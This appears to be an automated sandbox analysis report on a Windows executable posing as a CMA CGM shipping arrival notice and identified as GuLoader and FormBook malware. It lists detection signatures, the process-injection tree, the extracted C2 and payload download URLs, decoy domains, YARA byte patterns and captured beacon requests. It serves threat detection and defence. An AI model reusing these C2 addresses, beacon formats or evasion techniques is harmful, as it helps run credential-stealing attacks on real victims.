Windows Analysis Report NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe

Overview

General Information

Sample Name:NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Analysis ID:482590
MD5:e8bceea59b2074bd08bf68ab55ecdf3e
SHA1:8b62bf811b03fe25924ef6ff4d4afd89c902f7cd
SHA256:0b4684d82509a6e7e0c1cb63174bf68d182ccff75a3d19f16821127605d636b8
Tags:exe

Detection

GuLoader FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: E8BCEEA59B2074BD08BF68AB55ECDF3E)
    • NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe (PID: 6396 cmdline: 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: E8BCEEA59B2074BD08BF68AB55ECDF3E)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6200 cmdline: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.acooll.com/kbl2/"], "decoy": ["beckyhartpcpublishers.com", "durangosouladventures.com", "taylormakeyourlife.com", "vs88333.com", "electromoto.net", "kratusconsultoria.com", "ecolightingsolution.com", "changethenarrowtive.com", "interpunctto.com", "thelogicsticks.com", "priorpublic.com", "altamirasound.com", "zx136.com", "everythingswallow.com", "rlmwebcreations.com", "zogaripet.com", "stewco360.com", "cassiwalsh.com", "syst.taipei", "thefairwaywithin.com", "barrows66.online", "tablebarn.net", "gabrielladasilva.com", "anqiu.tech", "store504.com", "findmytribe.online", "hrlaboris.com", "packetin.com", "managinginit.com", "sfseminars.com", "evieguest.com", "toptanbezmaske.com", "veryzocn.com", "frendapp.net", "maraging-trade.com", "allinonemigration.com", "waifufood.com", "advancepestcontrol.website", "onetimerecovery.com", "theranchsmokehouse.com", "executivehomefinance.com", "gotothisnotary.com", "tousentrepreneur.com", "flow-dynamics.online", "open-numeric-center.com", "itonlylookshard.com", "losangelescustomupholstery.com", "wichitavillagefleamarket.com", "tigerlottotips.com", "videoquests.com", "osdentalcol.com", "easypercetakan.com", "havensretreatspa.com", "7-fwd.com", "bumbles.online", "microsoftjob.com", "wxsjykj.com", "numberoneratedinfiveg.com", "taylorservewest.com", "normalblue.com", "yes2synergy.com", "dominionhavanese.com", "tranmanh.net", "tanja-wenzel.com"]}

Threatname: GuLoader

{"Payload URL": "https://www.paulassinkarchitect.nl/bin_fDiyu115.bin"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x1a508:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

      Sigma Overview

      System Summary:

      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
      Source: Process started, Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5228
      Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
      Source: Process started, Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5228

      Jbx Signature Overview

      AV Detection:

      Found malware configuration
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.paulassinkarchitect.nl/bin_fDiyu115.bin"}
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
      Multi AV Scanner detection for submitted file
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Virustotal: Detection: 25%
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, ReversingLabs: Detection: 18%
      Yara detected FormBook
      Source: Yara match, File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: 14.2.rundll32.exe.a04480.0.unpack, Avira: Label: TR/Dropper.Gen
      Source: 14.2.rundll32.exe.4d6f834.4.unpack, Avira: Label: TR/Dropper.Gen
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknown, HTTPS traffic detected: 91.184.0.38:443 -> 192.168.2.4:49817 version: TLS 1.2
      Source: Binary string: wntdll.pdbUGP source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.1746538018.0000000004840000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp
      Source: Binary string: rundll32.pdbGCTL source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp

      Networking:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe, Network Connect: 209.99.40.222 80
      Source: C:\Windows\explorer.exe, Network Connect: 142.111.236.6 80
      Source: C:\Windows\explorer.exe, Domain query: www.microsoftjob.com
      Source: C:\Windows\explorer.exe, Network Connect: 160.153.136.3 80
      Source: C:\Windows\explorer.exe, Domain query: www.wxsjykj.com
      Source: C:\Windows\explorer.exe, Domain query: www.everythingswallow.com
      Source: C:\Windows\explorer.exe, Domain query: www.acooll.com
      Source: C:\Windows\explorer.exe, Network Connect: 44.227.76.166 80
      Source: C:\Windows\explorer.exe, Domain query: www.priorpublic.com
      Source: C:\Windows\explorer.exe, Network Connect: 91.195.240.117 80
      Source: C:\Windows\explorer.exe, Network Connect: 54.65.172.3 80
      Source: C:\Windows\explorer.exe, Domain query: www.taylormakeyourlife.com
      Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exe, Domain query: www.beckyhartpcpublishers.com
      Source: C:\Windows\explorer.exe, Domain query: www.rlmwebcreations.com
      Source: C:\Windows\explorer.exe, Domain query: www.dominionhavanese.com
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractor, URLs: www.acooll.com/kbl2/
      Source: Malware configuration extractor, URLs: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
      Source: Joe Sandbox View, ASN Name: SEDO-ASDE SEDO-ASDE
      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.everythingswallow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.priorpublic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.taylormakeyourlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=ocgDBp8RB+Xp1FSN2g/g4Fu1UIpmvfcN211VFkYNpS2VJIx3qol2ed8JVuLDA1eIgF2c&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.rlmwebcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.beckyhartpcpublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.microsoftjob.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.wxsjykj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.acooll.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox View, IP Address: 91.195.240.117 91.195.240.117
      Source: global trafficHTTP traffic detected: GET /bin_fDiyu115.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.paulassinkarchitect.nlCache-Control: no-cache
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 13 Sep 2021 21:01:26 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000003.1187824235.00000000009C6000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/10_Best_Mutual_Funds.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrO
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Anti_Wrinkle_Creams.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Best_Penny_Stocks.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Cheap_Air_Tickets.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Parental_Control.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Top_Smart_Phones.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/display.cfm
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/kbl2/?X8sl8h70=ocgDBp8RB
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/song_lyrics.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3ErTA9i3
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258590873.000000000098E000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin7
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin?
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binW
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binqs
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.value-domain.com/
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.value-domain.com/modall.php
      Source: unknownDNS traffic detected: queries for: www.paulassinkarchitect.nl
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929269162.00000000007BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara match, File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Initial sample is a PE file and has a suspicious name
      Source: initial sample, Static PE information: Filename: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
